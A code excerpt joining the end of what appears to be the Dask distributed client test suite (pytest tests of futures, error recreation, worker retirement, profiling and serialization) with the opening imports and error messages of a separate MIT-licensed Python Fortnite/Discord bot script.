with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
function, args, kwargs = yield c._recreate_error_locally(f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
function, args, kwargs = yield c._recreate_error_locally(f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
function, args, kwargs = yield c._recreate_error_locally(df3)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
func, args, kwargs = yield c._recreate_error_locally(zz)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
yield c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
start = time()
while a.status != "closed":
yield gen.sleep(0.01)
assert time() < start + 5
class MyException(Exception):
pass
@gen_cluster(client=True)
def test_robust_unserializable(c, s, a, b):
class Foo(object):
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = yield c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
def test_robust_undeserializable(c, s, a, b):
class Foo(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
yield future
futures = c.map(inc, range(10))
results = yield c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
def test_robust_undeserializable_function(c, s, a, b):
class Foo(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
yield future
futures = c.map(inc, range(10))
results = yield c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
start = time()
while not hasattr(distributed, "foo"):
yield gen.sleep(0.01)
assert time() < start + 2
assert distributed.foo == 123
finally:
del distributed.foo
start = time()
while len(s.tasks) > 1:
yield gen.sleep(0.01)
assert time() < start + 2
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
yield gen.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(loop=loop, processes=False, threads_per_worker=4) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
def test_close(s, a, b):
c = yield Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
yield wait(future)
assert c.id in s.wants_what
yield c.close()
start = time()
while c.id in s.wants_what or s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = yield c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=r"^{}$".format(msg)):
get_client()
@gen_cluster(client=True)
def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = yield future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1, timeout=100)
def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = yield c.submit(f)
assert result == 2
@pytest.mark.slow
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2, timeout=60)
def test_secede_balances(c, s, a, b):
count = threading.active_count()
def f(x):
client = get_client()
sleep(0.01) # do some work
secede()
futures = client.map(slowinc, range(10), pure=False, delay=0.01)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(100))
start = time()
while not all(f.status == "finished" for f in futures):
yield gen.sleep(0.01)
assert threading.active_count() < count + 50
# assert 0.005 < s.task_duration['f'] < 0.1
assert len(a.log) < 2 * len(b.log)
assert len(b.log) < 2 * len(a.log)
results = yield c.gather(futures)
assert results == [sum(map(inc, range(10)))] * 100
@gen_cluster(client=True)
def test_sub_submit_priority(c, s, a, b):
def f():
client = get_client()
client.submit(slowinc, 1, delay=0.2, key="slowinc")
future = c.submit(f, key="f")
yield gen.sleep(0.1)
if len(s.tasks) == 2:
assert (
s.priorities["f"] > s.priorities["slowinc"]
) # lower values schedule first
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = yield c.scatter(ddf)
ddf2 = yield future
df2 = yield c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def _test_dynamic_workloads_sync(c, delay):
future = c.submit(_dynamic_workload, 0, delay=delay)
assert future.result(timeout=40) == 52
def test_dynamic_workloads_sync(c):
_test_dynamic_workloads_sync(c, delay=0.02)
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
_test_dynamic_workloads_sync(c, delay="random")
@gen_cluster(client=True)
def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = yield future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
def test_unicode_ascii_keys(c, s, a, b):
uni_type = type(u"")
key = u"inc-123"
future = c.submit(inc, 1, key=key)
result = yield future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
def test_unicode_keys(c, s, a, b):
uni_type = type(u"")
key = u"inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = yield future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = yield future2
assert result2 == 3
future3 = yield c.scatter({u"data-123": 123})
result3 = yield future3[u"data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
@gen.coroutine
def f():
x = yield c.scatter(123)
y = c.submit(inc, x)
z = yield c.gather(y)
raise gen.Return(z)
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(
loop=loop, scheduler_port=0, dashboard_address=None, silence_logs=False
) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
yield gen.sleep(0.1)
results = yield [c.call_stack(future), c.call_stack(keys=[future.key])]
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
w = a if future.key in a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing and not b.executing:
yield gen.sleep(0.01)
result = yield c.call_stack()
w = a if a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
yield gen.sleep(0.001)
result = yield c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
yield gen.sleep(0.001)
result = yield c.call_stack()
assert result
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": 100})
def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
yield wait(futures)
x = yield c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = yield c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = yield c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = yield c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": 100})
def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
yield wait(x + y)
xp = yield c.profile("slowinc")
yp = yield c.profile("slowdec")
p = yield c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = yield c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = yield Client(
s.address, asynchronous=True, name="foo", silence_logs=False
)
assert "foo" in client.id
yield client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
yield wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
yield wait(x)
client = yield Client(s.address, asynchronous=True)
future = Future(x.key, client)
start = time()
while future.status != "finished":
yield gen.sleep(0.01)
assert time() < start + 1
yield client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = yield future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
def test_task_metadata(c, s, a, b):
yield c.set_metadata("x", 1)
result = yield c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
yield wait(future)
yield c.set_metadata(key, 123)
result = yield c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
yield gen.sleep(0.01)
with pytest.raises(KeyError):
yield c.get_metadata(key)
result = yield c.get_metadata(key, None)
assert result is None
yield c.set_metadata(["x", "a"], 1)
result = yield c.get_metadata("x")
assert result == {"a": 1}
yield c.set_metadata(["x", "b"], 2)
result = yield c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = yield c.get_metadata(["x", "a"])
assert result == 1
yield c.set_metadata(["x", "a", "c", "d"], 1)
result = yield c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
def test_logs(c, s, a, b):
yield wait(c.map(inc, range(5)))
logs = yield c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = yield c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = yield c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = yield c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = yield future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = yield Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
yield c.close()
@gen_cluster(client=True)
def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster()
def test_scatter_direct(s, a, b):
c = yield Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
start = time()
while s.clients[c.id].last_seen == last:
yield gen.sleep(0.10)
assert time() < start + 5
yield c.close()
@pytest.mark.skipif(sys.version_info[0] < 3, reason="cloudpickle Py27 issue")
@gen_cluster(client=True)
def test_unhashable_function(c, s, a, b):
d = {"a": 1}
result = yield c.submit(d.get, "a")
assert result == 1
@gen_cluster()
def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = yield Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
yield c.close()
def test_client_doesnt_close_given_loop(loop, s, a, b):
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
yield s.close()
yield c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
pytest.importorskip("bokeh")
from distributed.dashboard import BokehScheduler
monkeypatch.setenv("USER", "myusername")
with cluster(
scheduler_kwargs={"services": {("dashboard", 12355): BokehScheduler}}
) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
text = c._repr_html_()
link = "http://foo-myusername:12355/status"
assert link in text
@gen_test()
def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
yield c
stop = time()
assert c.status == "closed"
yield c.close()
assert stop - start < 1
@gen_test()
def test_client_active_bad_port():
import tornado.web
import tornado.httpserver
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
yield c
yield c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
def test(s, a, b):
import numpy as np
c = yield Client(s.address, asynchronous=True, serializers=["dask", "msgpack"])
try:
assert (yield c.submit(inc, 1)) == 2
yield c.submit(np.ones, 5)
yield c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = yield c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
yield wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
yield c.gather(future, direct=direct)
# Run works
result = yield c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = yield c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
yield c.run(lambda: inc)
with pytest.raises(TypeError):
yield c.run_on_scheduler(lambda: inc)
finally:
yield c.close()
test()
@gen_cluster()
def test_de_serialization(s, a, b):
import numpy as np
c = yield Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = yield c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = yield future
finally:
yield c.close()
@gen_cluster()
def test_de_serialization_none(s, a, b):
import numpy as np
c = yield Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = yield c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = yield future
finally:
yield c.close()
@gen_cluster()
def test_client_repr_closed(s, a, b):
c = yield Client(s.address, asynchronous=True, dashboard_address=None)
yield c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=None) as c:
c.close()
c._repr_html_()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
yield wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[tokey(fx.key)].priority < s.tasks[tokey(fy.key)].priority
)
@gen_cluster(client=True)
def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = yield c.scatter(1)
y = c.submit(bad_fn, x)
del x
yield wait(y)
assert y.status == "error"
yield gen.sleep(0.1)
assert y.status == "error" # not cancelled
def test_no_threads_lingering():
active = dict(threading._active)
assert threading.active_count() < 40, list(active.values())
@gen_cluster()
def test_direct_async(s, a, b):
c = yield Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
yield c.close()
c = yield Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
yield c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
def test_mixing_clients(s, a, b):
c1 = yield Client(s.address, asynchronous=True)
c2 = yield Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
yield c1.close()
yield c2.close()
@gen_cluster(client=True)
def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (yield future) == 3
@gen_cluster(client=True)
def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
yield gen.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
yield future
with dask.config.set(foo=True):
yield future.retry()
yield future
@gen_cluster(client=True)
def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
yield y
with dask.config.set(foo=100):
yield y.retry()
result = yield y
assert result == 101
yield y.retry()
yield x.retry()
result = yield y
assert result == 101
@gen_cluster(client=True)
def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
yield y
with dask.config.set(foo=100):
yield y.retry()
result = yield y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
yield c.map(slowinc, range(10), delay=0.2)
state, figure = yield c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
yield c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = yield future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = yield c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = yield c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
yield gen.sleep(0.22) # 2 chances
assert not future.done()
w = yield Worker(s.address)
start = time()
yield future
assert time() < start + 1
yield w.close()
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
start = proc.num_fds()
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Worker(s.address, nthreads=2) as a, Worker(
s.address, nthreads=2
) as b:
async with Client(s.address, asynchronous=True) as c:
await df.sum().persist()
begin = time()
while proc.num_fds() > begin:
await asyncio.sleep(0.01)
assert time() < begin + 5, (start, proc.num_fds())
if sys.version_info >= (3, 5):
from distributed.tests.py3_test_client import * # noqa F401
|
index.py
|
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 gomashio1596
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
try:
import asyncio
import copy
import datetime
import json
import logging
import os
import platform
import random
import re
import socket
import string
import sys
import time
import traceback
import unicodedata
import webbrowser
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, as_completed
from functools import partial, wraps
from glob import glob
from threading import Thread, Timer
from typing import Any, Callable, List, Optional, Type, Union
except ModuleNotFoundError as e:
import traceback
print(traceback.format_exc())
import platform
print(f'Python {platform.python_version()}\n')
print('標準ライブラリの読み込みに失敗しました。Pythonのバージョンが間違っている可能性があります。Pythonの再インストールなどを試してみてください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
print('Failed to load basic library. Python version maybe wrong. Try reinstall Python. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
try:
import aiohttp
import discord
import fortnitepy
import jaconv
import requests
import sanic.exceptions
import sanic.response
from aioconsole import ainput
from crayons import cyan, green, magenta, red, yellow
from fortnitepy import ClientPartyMember, Enum
from jinja2 import Environment, FileSystemLoader
from sanic import Sanic
from sanic.request import Request
except ModuleNotFoundError as e:
print(traceback.format_exc())
print(f'Python {platform.python_version()}\n')
print('サードパーティーライブラリの読み込みに失敗しました。INSTALL.bat を実行してください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
